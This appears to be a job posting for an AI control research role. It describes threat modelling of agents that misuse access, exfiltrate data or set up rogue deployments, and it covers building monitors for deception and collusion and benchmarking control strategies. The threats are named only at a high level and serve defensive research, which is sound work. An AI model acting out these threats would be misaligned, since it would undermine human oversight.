Description
Agents are increasingly used to handle long-horizon tasks. We already see this in coding, where advances are moving us from simple code autocomplete to advanced AI systems that write code, build, test, and debug all on their own. As we get closer to AGI, we need guarantees that help control and guide these agents, especially in scenarios where the agent’s capabilities may exceed those of the systems tasked with monitoring it. You will:
- Go beyond traditional security assumptions to model how a highly capable agent could misuse its access, exfiltrate data, or establish a rogue deployment within complex production environments.
- Develop techniques for monitoring advanced agents. How can we detect emergent deception, collusion, or obscured long-term plans before they result in harmful actions?
- Create novel evaluation methodologies and benchmarks to measure the effectiveness of different control strategies against highly capable simulated adversaries.
Key responsibilities:
- Identify and formalize unsolved research problems in AI control, focusing on the unique challenges posed by agents that may exceed human oversight capabilities.
- Design, prototype, and evaluate novel control systems and monitoring techniques. This includes theoretical work, large-scale experiments, and building proof-of-concept systems.
- Collaborate closely with teams working on Gemini and agent infrastructure to understand emergent risks and integrate control mechanisms directly into the systems where they are most needed.
- Publish groundbreaking research and contribute to the broader academic and policy conversation on long-term AI safety and control.